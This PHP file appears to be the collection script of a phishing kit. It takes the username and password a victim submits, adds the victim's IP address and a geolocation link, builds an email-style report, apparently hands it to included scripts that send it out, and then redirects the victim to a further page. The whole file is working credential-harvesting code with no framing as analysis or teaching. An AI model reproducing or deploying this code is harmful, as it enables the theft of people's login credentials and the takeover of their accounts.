<?php
session_start();
if (!empty($_POST['7d0efbb13149a3b71a8137c65b29361ced9197e0'])) {
if (hash_equals($_SESSION['$2a$06$J0gmLNEjVXkLgF6oU8zpfu9Y49lhVpIrkZFuaQZMeGr.kA5NiU5wK'], $_POST['7d0efbb13149a3b71a8137c65b29361ced9197e0'])) {
$mutpern = getenv("REMOTE_ADDR");
require_once '../mnp/sci.php';
$subject = "jmor  [ " . $mutpern . " ] /";
$headers = "From: kanrun <mutdes>\r\n";
$message .= "
+-/!\-+
 [SPD]   : ".$_POST['username']."
 [NRC]   : ".$_POST['password']."
-----
+-/!\-<.![+] NupDatip [+]!.>-/!\-+
 [IP] :  https://geoiptool.com/en/?ip=".$_SERVER['REMOTE_ADDR']."
+-/!\-<.! !.>-/!\-+>
\n";
$ysed = base64_encode(time().sha1($_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT']).md5(uniqid(rand(), true)));
require '../nusip.php';
unset($_SESSION['$2a$06$J0gmLNEjVXkLgF6oU8zpfu9Y49lhVpIrkZFuaQZMeGr.kA5NiU5wK']);
header("Location: ./acceptverc.php?$ysed");
} else {
	header('Location: error.html');
	}
} else {
	header('Location: error.html');
}
?>